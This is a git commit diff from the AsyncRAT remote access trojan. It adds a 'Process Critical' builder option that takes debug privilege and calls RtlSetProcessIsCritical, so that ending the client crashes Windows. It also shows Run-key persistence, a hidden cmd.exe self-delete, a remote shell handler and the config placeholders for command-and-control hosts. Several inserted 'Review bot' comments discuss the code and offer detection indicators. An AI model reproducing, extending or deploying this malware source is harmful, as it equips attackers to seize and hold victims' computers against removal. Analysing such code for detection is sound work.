-Added process critical - thanks to MrDevBot
-Add a method to handle client's exit
-Minor bugs fixed
NYAN CAT 2019-05-20 18:34:33 +03:00
parent 4626e891b1
commit 1846a77b5a
13 changed files with 120 additions and 39 deletions

File diff suppressed because one or more lines are too long


@ -46,6 +46,7 @@ namespace AsyncRAT_Sharp.Forms
this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.groupBox3 = new System.Windows.Forms.GroupBox();
this.chkBdos = new System.Windows.Forms.CheckBox();
this.txtMutex = new System.Windows.Forms.TextBox();
this.label5 = new System.Windows.Forms.Label();
this.chkAnti = new System.Windows.Forms.CheckBox();
@ -54,6 +55,7 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1 = new System.Windows.Forms.TabPage();
this.tabPage2 = new System.Windows.Forms.TabPage();
this.tabPage3 = new System.Windows.Forms.TabPage();
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.groupBox1.SuspendLayout();
this.groupBox2.SuspendLayout();
this.groupBox3.SuspendLayout();
@ -61,11 +63,12 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1.SuspendLayout();
this.tabPage2.SuspendLayout();
this.tabPage3.SuspendLayout();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// button1
//
this.button1.Location = new System.Drawing.Point(6, 236);
this.button1.Location = new System.Drawing.Point(3, 302);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(440, 49);
this.button1.TabIndex = 0;
@ -225,20 +228,32 @@ namespace AsyncRAT_Sharp.Forms
//
// groupBox3
//
this.groupBox3.Controls.Add(this.pictureBox1);
this.groupBox3.Controls.Add(this.chkBdos);
this.groupBox3.Controls.Add(this.txtMutex);
this.groupBox3.Controls.Add(this.label5);
this.groupBox3.Controls.Add(this.chkAnti);
this.groupBox3.Location = new System.Drawing.Point(6, 17);
this.groupBox3.Name = "groupBox3";
this.groupBox3.Size = new System.Drawing.Size(440, 174);
this.groupBox3.Size = new System.Drawing.Size(440, 229);
this.groupBox3.TabIndex = 9;
this.groupBox3.TabStop = false;
this.groupBox3.Text = "MISC";
//
// chkBdos
//
this.chkBdos.AutoSize = true;
this.chkBdos.Location = new System.Drawing.Point(21, 82);
this.chkBdos.Name = "chkBdos";
this.chkBdos.Size = new System.Drawing.Size(143, 24);
this.chkBdos.TabIndex = 12;
this.chkBdos.Text = "Process Critical";
this.chkBdos.UseVisualStyleBackColor = true;
//
// txtMutex
//
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtMutex.Location = new System.Drawing.Point(106, 98);
this.txtMutex.Location = new System.Drawing.Point(106, 165);
this.txtMutex.Name = "txtMutex";
this.txtMutex.Size = new System.Drawing.Size(271, 26);
this.txtMutex.TabIndex = 11;
@ -247,7 +262,7 @@ namespace AsyncRAT_Sharp.Forms
// label5
//
this.label5.AutoSize = true;
this.label5.Location = new System.Drawing.Point(14, 102);
this.label5.Location = new System.Drawing.Point(14, 169);
this.label5.Name = "label5";
this.label5.Size = new System.Drawing.Size(52, 20);
this.label5.TabIndex = 10;
@ -308,6 +323,16 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage3.Text = "Misc";
this.tabPage3.UseVisualStyleBackColor = true;
//
// pictureBox1
//
this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
this.pictureBox1.Location = new System.Drawing.Point(181, 74);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(32, 32);
this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.AutoSize;
this.pictureBox1.TabIndex = 13;
this.pictureBox1.TabStop = false;
//
// FormBuilder
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@ -329,6 +354,7 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1.ResumeLayout(false);
this.tabPage2.ResumeLayout(false);
this.tabPage3.ResumeLayout(false);
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
}
@ -359,5 +385,7 @@ namespace AsyncRAT_Sharp.Forms
private System.Windows.Forms.TabPage tabPage1;
private System.Windows.Forms.TabPage tabPage2;
private System.Windows.Forms.TabPage tabPage3;
private System.Windows.Forms.CheckBox chkBdos;
private System.Windows.Forms.PictureBox pictureBox1;
}
}


@ -147,6 +147,9 @@ namespace AsyncRAT_Sharp.Forms
if (operand == "%Serversignature%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
if (operand == "%BDOS%")
methodDef.Body.Instructions[i].Operand = chkBdos.Checked.ToString().ToLower();
if (operand == "%Pastebin%")
if (chkPastebin.Checked)
methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text);
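Review bot: The added `%BDOS%` branch carries no comment saying what the placeholder stands for or which values it takes, and the name does not match the checkbox label "Process Critical" set in the designer file. From the visible line the operand becomes the lower-cased checkbox state, `"true"` or `"false"`, written as plain text, while the `%Serversignature%` and `%Pastebin%` operands beside it go through `aes.Encrypt`; for an analyst extracting configuration from a built client this means the flag is readable without the key. I would add `// %BDOS%: "true"/"false" from the "Process Critical" checkbox; written unencrypted` above the branch. The enclosing loop and method start and end outside this hunk.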


@ -16,6 +16,6 @@ namespace AsyncRAT_Sharp
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.4.8B";
public static readonly string Version = "AsyncRAT 0.4.8C";
}
}


@ -105,6 +105,7 @@
<DependentUpon>FormChat.cs</DependentUpon>
</Compile>
<Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\ProcessCritical.cs" />
<Compile Include="Install\NormalStartup.cs" />
<Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" />


@ -1,4 +1,5 @@
using Microsoft.Win32;
using Client.Helper;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
@ -6,6 +7,7 @@ using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
using System.Windows.Forms;
namespace Client.Handle_Packet
{
@ -28,7 +30,7 @@ namespace Client.Handle_Packet
}
};
proc.Start();
Environment.Exit(0);
Methods.ClientExit();
}
catch { }
}


@ -10,14 +10,14 @@ using System.Text;
namespace Client.Handle_Packet
{
public class HandleUninstall
public class HandleUninstall
{
public HandleUninstall()
{
if (Convert.ToBoolean(Settings.Install))
if (Convert.ToBoolean(Settings.Install))
{
try
{
try
{
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
else
@ -34,25 +34,24 @@ namespace Client.Handle_Packet
}
}
catch { }
}
ProcessStartInfo Del = null;
try
}
ProcessStartInfo Del = null;
try
{
Del = new ProcessStartInfo()
{
Del = new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
}
catch { }
finally
{
Methods.CloseMutex();
Process.Start(Del);
Environment.Exit(0);
}
Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
};
}
catch { }
finally
{
Process.Start(Del);
Methods.ClientExit();
}
}
}
}


@ -85,7 +85,7 @@ namespace Client.Handle_Packet
ClientSocket.Client.Dispose();
}
catch { }
Environment.Exit(0);
Methods.ClientExit();
break;
}
@ -98,7 +98,7 @@ namespace Client.Handle_Packet
}
catch { }
Process.Start(Application.ExecutablePath);
Environment.Exit(0);
Methods.ClientExit();
break;
}
@ -270,7 +270,7 @@ namespace Client.Handle_Packet
case "shellWriteInput":
{
if (HandleShell.ProcessShell != null)
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
break;
}


@ -43,5 +43,13 @@ namespace Client.Helper
_appMutex = null;
}
}
public static void ClientExit()
{
if (Convert.ToBoolean(Settings.BDOS))
ProcessCritical.Exit();
CloseMutex();
Environment.Exit(0);
}
}
}
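Review bot: `ClientExit()` has no comment explaining why `ProcessCritical.Exit()` has to run before `Environment.Exit(0)`. `ProcessCritical.Set()` in this commit marks the process as critical, and Windows bugchecks when a process in that state ends, so this method is the only path visible in the commit that clears the flag first. Any termination that bypasses it (an external kill or an unhandled exception; inferred, since the other exit paths are not all visible here) would leave the flag set, which is what a responder should expect when ending this process on a host built with the option enabled. I would add `// Clear the critical-process flag first: ending a process still marked critical crashes the OS.` above the `if`. The class body starts outside this hunk.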


@ -0,0 +1,32 @@
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Client.Helper
{
public static class ProcessCritical
{
public static void Set()
{
try
{
Process.EnterDebugMode();
RtlSetProcessIsCritical(1, 0, 0);
}
catch { }
}
public static void Exit()
{
try
{
RtlSetProcessIsCritical(0, 0, 0);
}
catch { }
}
#region "Native Methods"
[DllImport("ntdll.dll", SetLastError = true)]
private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
#endregion
}
}
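Review bot: This new file has no summary comment describing what it does to the host: `Set()` enables debug privilege with `Process.EnterDebugMode()` and then calls `RtlSetProcessIsCritical(1, 0, 0)`, after which ending the process makes Windows bugcheck; `Exit()` passes `0` to clear the flag. Because `EnterDebugMode()` sits first inside the `try` and both methods end in an empty `catch { }`, a run without the required privilege (presumably any non-elevated one) skips the native call silently, so a ticked builder option does not prove that a given running sample is critical. The import is also declared `void`, so no status from the call is ever inspected or logged. For detection, a managed assembly importing `RtlSetProcessIsCritical` from `ntdll.dll` alongside a call to `Process.EnterDebugMode()` is a static indicator that can be read straight from this hunk. I would add a `<summary>` on the class stating these effects and the privilege requirement.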


@ -69,9 +69,8 @@ namespace Client.Install
WindowStyle = ProcessWindowStyle.Hidden
});
}
Methods.CloseMutex();
Process.Start(Settings.ClientFullPath);
Environment.Exit(0);
Methods.ClientExit();
}
}
catch (Exception ex)


@ -34,6 +34,9 @@ namespace Client
if (Convert.ToBoolean(Settings.Install))
NormalStartup.Install();
if (Convert.ToBoolean(Settings.BDOS))
ProcessCritical.Set();
#if DEBUG
ClientSocket.InitializeClient();
#else


@ -12,7 +12,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
public static string Version = "AsyncRAT 0.4.8d";
public static string Version = "AsyncRAT 0.4.9C";
public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Key = "NYAN CAT";
@ -23,10 +23,12 @@ namespace Client
public static string Anti = "false";
public static Aes256 aes256 = new Aes256(Key);
public static string Pastebin = "null";
public static string BDOS = "false";
#else
public static string Ports = "%Ports%";
public static string Hosts = "%Hosts%";
public static string Version = "AsyncRAT 0.4.9B";
public static string Version = "AsyncRAT 0.4.9C";
public static string Install = "%Install%";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%");
public static string Key = "%Key%";
@ -37,6 +39,7 @@ namespace Client
public static readonly string Anti = "%Anti%";
public static Aes256 aes256;
public static string Pastebin = "%Pastebin%";
public static string BDOS = "%BDOS%";
#endif